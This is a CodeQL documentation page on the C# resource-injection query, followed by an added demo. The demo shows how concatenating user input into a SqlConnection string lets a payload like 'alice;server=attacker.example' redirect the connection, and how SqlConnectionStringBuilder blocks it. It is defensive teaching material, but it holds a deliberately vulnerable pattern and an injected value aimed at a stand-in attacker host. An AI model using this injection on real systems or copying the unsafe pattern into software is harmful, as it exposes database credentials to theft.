CodeQL documentation
CodeQL resources

Resource injection

ID: cs/resource-injection
Kind: path-problem
Security severity: 9.8
Severity: error
Precision: high
Tags:
   - security
   - external/cwe/cwe-099
Query suites:
   - csharp-code-scanning.qls
   - csharp-security-extended.qls
   - csharp-security-and-quality.qls

Click to see the query in the CodeQL repository

If a resource descriptor is built using string concatenation, and the components of the concatenation include user input, a user may be able to hijack the resource which is loaded.

Recommendation

If user input must be included in a resource descriptor, it should be escaped to avoid a malicious user providing special characters that change the meaning of the descriptor. If possible, use an existing library to either escape or construct the resource.

For data connections within sub namespaces of System.Data, a connection builder class is provided. For example, a connection string which is to be passed to System.Data.SqlClient.SqlConnection can be constructed safely using an instance of System.Data.SqlClient.SqlConnectionStringBuilder.

Example

In the following examples, the code accepts a user name from the user, which it uses to create a connection string for an SQL database.

The first example concatenates the unvalidated and unencoded user input directly into the connection string. A malicious user could provide special characters to change the meaning of the connection string, and connect to a completely different server.

The second example uses the SqlConnectionStringBuilder to construct the connection string, which quotes any value that contains delimiter characters and therefore prevents a malicious user from modifying the meaning of the connection string.

using System.Data.SqlClient;
using System.Web;

public class ResourceInjectionHandler : IHttpHandler
{
    // IHttpHandler requires this member; it was missing from the snippet and is
    // needed for the class to compile.
    public bool IsReusable => false;

    public void ProcessRequest(HttpContext ctx)
    {
        string userName = ctx.Request.QueryString["userName"];

        // BAD: Direct use of user input in a connection string passed to SqlConnection
        string connectionString = "server=(local);user id=" + userName + ";password= pass;";
        SqlConnection sqlConnectionBad = new SqlConnection(connectionString);

        // GOOD: Use SqlConnectionStringBuilder to safely include user input in a connection string
        SqlConnectionStringBuilder builder = new SqlConnectionStringBuilder();
        builder["Data Source"] = "(local)";
        builder["integrated Security"] = true;
        builder["user id"] = userName;
        SqlConnection sqlConnectionGood = new SqlConnection(builder.ConnectionString);
    }
}
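The following is an added example, not part of the CodeQL documentation, showing what "change the meaning of the connection string" looks like in practice. It feeds a constructed attacker payload through both the concatenation and the builder patterns above, then re-parses each result with SqlConnectionStringBuilder to see which server the connection would actually target. It relies on two documented SqlClient behaviours: "server" is a synonym for "Data Source", and when a keyword appears more than once the last occurrence wins. The class, method and payload names are this example's own.

```csharp
using System;
using System.Data.SqlClient;

// Added example (not CodeQL's or the page's own code): demonstrates resource
// injection into a SqlClient connection string and why the builder blocks it.
public static class ConnectionStringInjectionDemo
{
    // Constructed attacker-controlled input for this example. The ';' ends the
    // "user id" value early and the trailing "server=" is a synonym for
    // "Data Source", so it redirects the connection if it is parsed as a key.
    private const string Payload = "alice;server=attacker.example";

    // Mirrors the BAD pattern from the query documentation.
    public static string BuildByConcatenation(string userName)
    {
        return "server=(local);user id=" + userName + ";password= pass;";
    }

    // Mirrors the GOOD pattern: every value goes through the builder, which
    // quotes values containing ';' so they cannot introduce new keywords.
    public static string BuildWithBuilder(string userName)
    {
        var builder = new SqlConnectionStringBuilder
        {
            DataSource = "(local)",
            UserID = userName,
            Password = "pass",
        };
        return builder.ConnectionString;
    }

    // Resolve the server a given connection string would actually target.
    // SqlClient keeps the last occurrence of a repeated keyword, so an injected
    // "server=" placed after the user id overrides the hard-coded "(local)".
    public static string EffectiveDataSource(string connectionString)
    {
        return new SqlConnectionStringBuilder(connectionString).DataSource;
    }

    // The user id the connection would present, after the same re-parse.
    public static string EffectiveUserId(string connectionString)
    {
        return new SqlConnectionStringBuilder(connectionString).UserID;
    }

    public static void Main()
    {
        string bad = BuildByConcatenation(Payload);
        string good = BuildWithBuilder(Payload);

        Console.WriteLine("concatenated : " + bad);
        Console.WriteLine("  -> server  : " + EffectiveDataSource(bad));
        Console.WriteLine("  -> user id : " + EffectiveUserId(bad));
        Console.WriteLine("builder      : " + good);
        Console.WriteLine("  -> server  : " + EffectiveDataSource(good));
        Console.WriteLine("  -> user id : " + EffectiveUserId(good));

        // The property a unit test around such code should pin down: whatever
        // the user supplied, the builder-built string still targets the
        // intended server and the payload survives only as the user id value.
        if (EffectiveDataSource(good) != "(local)" || EffectiveUserId(good) != Payload)
        {
            throw new InvalidOperationException("builder output was hijacked");
        }
    }
}
```

Running this against the concatenated string shows the server resolving to attacker.example, with the credentials in the rest of the string sent to that host; the builder-built string keeps the whole payload, semicolon included, inside a quoted "User ID" value and still resolves to (local). The same re-parse check is a cheap assertion to add to tests for any code that assembles connection strings from request data.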
